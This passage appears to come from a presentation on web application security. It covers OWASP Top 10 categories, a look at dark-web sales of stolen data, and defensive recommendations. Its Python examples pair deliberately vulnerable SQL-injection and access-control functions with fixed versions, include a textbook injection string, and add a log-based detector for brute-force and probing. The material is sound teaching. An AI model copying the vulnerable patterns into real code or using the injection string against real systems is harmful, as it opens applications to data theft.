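                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    conn.executemany("INSERT INTO orders (owner_id, item) VALUES (?, ?)",
                     [(1, "laptop"), (2, "phone")])
    conn.commit()
    return conn


# A1 Injection, the 'before': the untrusted name becomes part of the SQL text,
# so the interpreter cannot tell data from command.
def find_user_vulnerable(conn, name):
    query = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


# A1 Injection, the fix: a bound parameter is always treated as a value and
# never parsed as SQL, whatever characters it contains.
def find_user_safe(conn, name):
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


# A5 Broken Access Control, the 'before': the row is returned to whoever
# supplies an id; nothing ties the order to the logged-in user.
def get_order_vulnerable(conn, order_id):
    return conn.execute(
        "SELECT id, owner_id, item FROM orders WHERE id = ?", (order_id,)
    ).fetchone()


# A5 fix: the ownership condition is part of the query itself, so a missing
# order and someone else's order look identical to the caller (None), which
# also avoids revealing which ids exist.
def get_order_safe(conn, order_id, current_user_id):
    return conn.execute(
        "SELECT id, owner_id, item FROM orders WHERE id = ? AND owner_id = ?",
        (order_id, current_user_id),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    hostile = "x' OR '1'='1"                   # textbook injection test string
    print(find_user_vulnerable(db, hostile))   # both users leak
    print(find_user_safe(db, hostile))         # []
    print(get_order_vulnerable(db, 2))         # bob's order, no check
    print(get_order_safe(db, 2, 1))            # None for alice
```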
  • 10. What Techniques Do Attackers Use?
    OWASP TOP 10 Explained, Part 2
    A6 - SECURITY MISCONFIGURATION: Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information.
    A7 - CROSS-SITE SCRIPTING (XSS): XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript.
    A8 - INSECURE DESERIALIZATION: Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
    A9 - USING COMPONENTS WITH KNOWN VULNERABILITIES: Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover.
    A10 - INSUFFICIENT LOGGING & MONITORING: Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data.
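As an added example that is not from the original presentation, this Python snippet shows the kind of monitoring A10 asks for, applied to the password guessing A2 describes and to access-control probing: it parses constructed access-log lines and flags clients with a burst of failed logins and clients collecting 403 responses on several distinct paths. The log format, thresholds and addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified Apache/nginx combined-format line; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log (RFC 5737 documentation addresses), not a real capture.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2018:10:00:01 +0000] "POST /login HTTP/1.1" 401 312
203.0.113.7 - - [10/Dec/2018:10:00:03 +0000] "POST /login HTTP/1.1" 401 312
203.0.113.7 - - [10/Dec/2018:10:00:04 +0000] "POST /login HTTP/1.1" 401 312
198.51.100.4 - - [10/Dec/2018:10:00:05 +0000] "POST /login HTTP/1.1" 401 312
203.0.113.7 - - [10/Dec/2018:10:00:06 +0000] "POST /login HTTP/1.1" 401 312
203.0.113.7 - - [10/Dec/2018:10:00:08 +0000] "POST /login HTTP/1.1" 401 312
198.51.100.4 - - [10/Dec/2018:10:00:09 +0000] "POST /login HTTP/1.1" 200 1480
203.0.113.7 - - [10/Dec/2018:10:00:10 +0000] "POST /login HTTP/1.1" 200 1480
203.0.113.9 - - [10/Dec/2018:10:01:00 +0000] "GET /admin HTTP/1.1" 403 201
203.0.113.9 - - [10/Dec/2018:10:01:01 +0000] "GET /admin/users HTTP/1.1" 403 201
203.0.113.9 - - [10/Dec/2018:10:01:02 +0000] "GET /api/orders/2 HTTP/1.1" 403 201
203.0.113.9 - - [10/Dec/2018:10:01:03 +0000] "GET /api/orders/3 HTTP/1.1" 403 201
"""


def parse_line(line):
    """Return a record dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def failed_login_bursts(records, threshold=5, window=timedelta(minutes=5)):
    """Clients with >= threshold failed logins (401 on POST /login) inside one window."""
    failures = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and r["path"] == "/login" and r["status"] == 401:
            failures[r["ip"]].append(r["ts"])
    alerts = {}
    for ip, stamps in failures.items():
        stamps.sort()
        left, best = 0, 0
        for right in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[right] - stamps[left] > window:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            alerts[ip] = best
    return alerts


def forbidden_probing(records, threshold=3):
    """Clients that got 403 on >= threshold distinct paths: likely probing access control."""
    paths = defaultdict(set)
    for r in records:
        if r["status"] == 403:
            paths[r["ip"]].add(r["path"])
    return {ip: sorted(p) for ip, p in paths.items() if len(p) >= threshold}
```

On the sample above, `failed_login_bursts` reports 203.0.113.7 with 5 failures and `forbidden_probing` reports 203.0.113.9 with four distinct forbidden paths; a single failed login from 198.51.100.4 stays below both thresholds.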
  • 11. What’s The Value Of Stolen Data? — How They Make Money
    We already know that the principal motivation for hackers is financial gain — to know in more detail how much money they make and how they sell the stolen data, we have to examine their communication channels. There are several ways for hackers to communicate, sell and exchange, but the most used is the "TOR Network," also known as the "dark web" or "deep web." Simply put, TOR is an uncensored internet network principally used by cybercriminals.
  • 12. What’s The Value Of Stolen Data? — How They Make Money
    Taking a Dive Into The “Deep Web”
    Dark web forums are one of the places where cybercriminals trade their goods. They use underground forums as a safe interface to advertise their products and services. It is extremely challenging to get access to most of these forums since they require extensive vetting and trust from other cybercriminals. For this presentation, we took a “safe dive” into the dark web with the purpose of examining cybercriminals' trading methods.
    Figure 1 – Most of the forums were either taken down or seized by international organizations such as the FBI, Interpol, Europol, and the DEA. It is pleasing to find that international government collaboration is in place to protect us from cybercriminals.
  • 13. What’s The Value Of Stolen Data? — How They Make Money
    Taking a Dive Into The “Deep Web”
    Figure 2 – As previously mentioned, it is tough to get access to these forums. The figure above lists the rules to access the "unrestricted areas" of this forum.
  • 14. What’s The Value Of Stolen Data? — How They Make Money
    Taking a Dive Into The “Deep Web”
    Figure 3 – We found another forum that used to have “free registration” — now you are required to be invited by a current member and pay a membership fee.
  • 15. What’s The Value Of Stolen Data? — How They Make Money
    Taking a Dive Into The “Deep Web”
    Figure 4 – After an intensive research period, we were able to get access to one of the least used marketplace forums for cybercriminals. In this figure, we can observe a few things:
    1. The principal payment method used by cybercriminals is the cryptocurrency Bitcoin.
    2. Stolen data is somewhat cheaper than expected: ~$10 USD for millions of stolen Dropbox records.
    3. Cybercriminal marketplaces are mostly organized.
    This database appears to be from the security breach reported by Dropbox in 2016 — back then cybercriminals were selling this information for around $1500 USD.
  • 16. What’s The Value Of Stolen Data? — How They Make Money
    Taking a Dive Into The “Deep Web”
    After our investigation in the deep web, we concluded that cybercriminals find our web applications very valuable and profitable. Below is a list of the services most commonly offered by cybercriminals (Cybercriminals' Marketplace For Web Applications):
    - Web Shells: This method provides direct access to your application, which allows them to resell it.
    - Distributed Malware: They modify the integrity of the code to distribute malware to the users using an Exploit Kit.
    - Credit Card Scraping: For applications handling payments, a code captures the entered credit card data and then stores it in a local file for the hackers to access.
    - Crypto Mining: Installing JS code in your application allows the cybercriminals to start mining cryptocurrencies for them.
    - Redirecting Traffic: They sell traffic redirection from your applications to other cybercriminals.
    - Database: They download a copy of the database to categorize and sell the information afterward.
  • 17. How Can We Protect Ourselves?
    Unethical hackers are restlessly trying to compromise web applications, and if we don't want to become one of their victims posted on the dark web, we must ensure that our systems are appropriately secured. There is more profitability in our web applications than we expected, even if no valuable data is present. Cybercriminals will use compromised web apps for a variety of things — needless to say, all actions of cybercriminals regarding our apps will affect us significantly.
    How can we protect ourselves? Sadly, there is no "one answer"; it depends on several factors that apply to the specific requirements of your application and organization. The good news is, as we previously mentioned, OWASP (Open Web Application Security Project) has an updated guideline created by industry experts and leading organizations to ensure your application is properly secured. Below are some recommended steps for improvement:
    Recommendations For Improvements
    - OWASP: OWASP has countless guidelines and best-practice documents to improve your application's overall security posture.
    - OWASP TOP 10: This is the best foundation when testing for security issues. Ensure that your tests follow this methodology.
    - Security Scanning: Formalize a process to perform regular automated and manual security scans.
    - Formalize a Software Development Lifecycle (SDLC): Reduce security issues and raise the overall security level at every stage of your application development.
    - Implement a Web Application Firewall: A WAF applies deep packet inspection (DPI) techniques to scan every HTTP request and response to identify and block any malicious content.
    - Independent Security Assessment: Perform regular web application security assessments using an independent contractor. This provides a degree of autonomy to test controls that you could be missing and an external view of potential security risks.
  • 18. References
    Below are the sources and citations used in this presentation:
    - 2018 Official Data Breach Investigations Report from Verizon: https://enterprise.verizon.com/resources/reports/dbir/
    - 2016 Uber Data Breach: https://www.uber.com/newsroom/2016-data-incident/
    - 2017 Equifax Data Breach: https://www.equifaxsecurity2017.com/2018/03/01/equifax-releases-updated-information-2017-cybersecurity-incident/
    - 2018 Under Armour Data Breach: http://investor.underarmour.com/releasedetail.cfm?ReleaseID=1062368
    - Average cost of a data breach (Accenture): https://www.accenture.com/us-en/event-cybertech-europe-2017?src=SOMS#block-insights-and-innovation
    - 2016 Yahoo Data Breach: https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/
    - 2018 Marriott Hotels Data Breach: http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/
    - OWASP TOP 10 - 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
  • 19. THANKS FOR WATCHING
    Questions, Thoughts, Fears or Doubts?
    @JaimeManteiga
    https://www.linkedin.com/in/jaimemanteiga/
    https://medium.com/@jaime.manteiga
    jaime.manteiga@Venkon.us